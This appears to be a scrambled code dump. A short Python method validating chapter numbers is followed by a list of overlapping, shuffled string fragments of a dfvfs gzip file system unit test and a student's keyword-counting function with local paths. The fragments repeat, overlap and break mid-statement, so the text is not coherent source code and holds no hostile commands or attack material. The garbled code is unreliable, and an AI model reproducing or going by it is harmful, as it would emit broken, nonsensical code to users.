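    def set_chapter_descr(self, chapter, descr):
        # Chapters are numbered 1..self.chapters, so both 0 and
        # self.chapters + 1 are out of range (see test_small / test_big).
        if not 1 <= chapter <= self.chapters:
            raise IndexError("chapter {} out of range".format(chapter))
        self._descriptions[chapter] = descr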
[ "None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification", "for the file system implementation using gzip.\"\"\" import os import unittest from dfvfs.path", "gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout", "used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec =", "throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file)", "None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__ ==", "context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self):", "by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def", "gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system", "os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system", "file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file", "file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout the", "get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry =", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self):", "file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system", "def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system =", "root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = 
file_system.GetRootFileEntry()", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by", "testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the", "testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open", "implementation using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path", "the file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec =", "os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by", "def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data',", "import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\"", "dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase):", "import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the", "file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__ == '__main__':", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file 
entry", "system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\"", "\"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from", "dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs", "os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver", "object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context", "testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "\"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file", "the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry", "def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz')", "-*- coding: utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import", "self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec)", "file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__ == '__main__': unittest.main()", "GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets", "= context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def", "entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec))", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close()", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) 
self.assertEqual(file_entry.name, u'') file_system.Close()", "objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec", "the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "= os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\"", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path", "using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import", "self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system =", "self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system", "None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test", "the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def", "test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'')", "for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects", "file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry,", "close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) 
self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def", "file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\"", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__", "the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used", "from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class", "self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system", "and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test", "# -*- coding: utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\"", "testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get", "from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from", "from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test", "get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry", "specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test", "file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\"", "\"\"\"Tests for the file system implementation using gzip.\"\"\" import os import unittest from", "gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", 
"u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and", "= gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "def setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context =", "class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\" def setUp(self):", "entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None)", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name,", "up the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file =", "\"\"\"Test the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "-*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import os import unittest", "path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self):", "the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if", "u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system =", "file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system =", "system implementation using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from", "import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The", "self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry", "context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip", "= file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root", "setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context 
= context.Context()", "test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test", "path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close", "exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close()", "specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None)", "\"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close()", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'')", "from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file", "entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry =", "file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get", "import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import", "by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec)", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name,", "dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for", "file system implementation using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec", "#!/usr/bin/python # -*- coding: utf-8 -*- \"\"\"Tests for the file system implementation using", "dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system", "gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\" def", "coding: utf-8 -*- \"\"\"Tests for the file system implementation using 
gzip.\"\"\" import os", "unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context", "unit test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the", "utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import os import", "import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import", "file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self):", "\"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry,", "\"\"\"The unit test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up", "None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification", "gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec", "the file system implementation using gzip.\"\"\" import os import unittest from dfvfs.path import", "= os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the", "None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\"" ]
[ "file: for word in line.split(): words.append(word.lower()) for element in words: if element in", "in words: if element in keywords: if element in sol: sol[element] += 1", "= [] sol = dict() with open(path) as file: for line in file:", "in sol: sol[element] += 1 else: sol[element] = 1 else: continue return sol", "sol[element] += 1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\",", "else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"]))", "count_keywords(path, keywords): words = [] sol = dict() with open(path) as file: for", "sol = dict() with open(path) as file: for line in file: for word", "element in sol: sol[element] += 1 else: sol[element] = 1 else: continue return", "keywords: if element in sol: sol[element] += 1 else: sol[element] = 1 else:", "sol: sol[element] += 1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms", "keywords): words = [] sol = dict() with open(path) as file: for line", "element in words: if element in keywords: if element in sol: sol[element] +=", "element in keywords: if element in sol: sol[element] += 1 else: sol[element] =", "Prep/midterms hs19/count_keywords.py def count_keywords(path, keywords): words = [] sol = dict() with open(path)", "<reponame>Queentaker/uzh<filename>Informatik1/Midterms Prep/midterms hs19/count_keywords.py def count_keywords(path, keywords): words = [] sol = dict() with", "words.append(word.lower()) for element in words: if element in keywords: if element in sol:", "with open(path) as file: for line in file: for word in line.split(): words.append(word.lower())", "continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\",", "open(path) as file: for line in file: for word in line.split(): words.append(word.lower()) for", "line.split(): words.append(word.lower()) for element in words: if element in keywords: if element in", "if element in keywords: if element in sol: sol[element] += 1 else: sol[element]", "= 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\",", "word in line.split(): words.append(word.lower()) for element in words: if element in keywords: if", "dict() with open(path) as file: for line in file: for word in line.split():", "for line in file: for word in line.split(): words.append(word.lower()) for element in words:", "= dict() with open(path) as file: for line in file: for word in", "for word in line.split(): words.append(word.lower()) for element in words: if element in keywords:", "sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) 
print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms", "words: if element in keywords: if element in sol: sol[element] += 1 else:", "1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"]))", "for element in words: if element in keywords: if element in sol: sol[element]", "def count_keywords(path, keywords): words = [] sol = dict() with open(path) as file:", "else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms", "return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", []))", "in file: for word in line.split(): words.append(word.lower()) for element in words: if element", "line in file: for word in line.split(): words.append(word.lower()) for element in words: if", "if element in sol: sol[element] += 1 else: sol[element] = 1 else: continue", "hs19/count_keywords.py def count_keywords(path, keywords): words = [] sol = dict() with open(path) as", "words = [] sol = dict() with open(path) as file: for line in", "[] sol = dict() with open(path) as file: for line in file: for", "in keywords: if element in sol: sol[element] += 1 else: sol[element] = 1", "as file: for line in file: for word in line.split(): words.append(word.lower()) for element", "1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\",", "file: for line in file: for word in line.split(): words.append(word.lower()) for element in", "+= 1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\",", "in line.split(): words.append(word.lower()) for element in words: if element in keywords: if element" ]
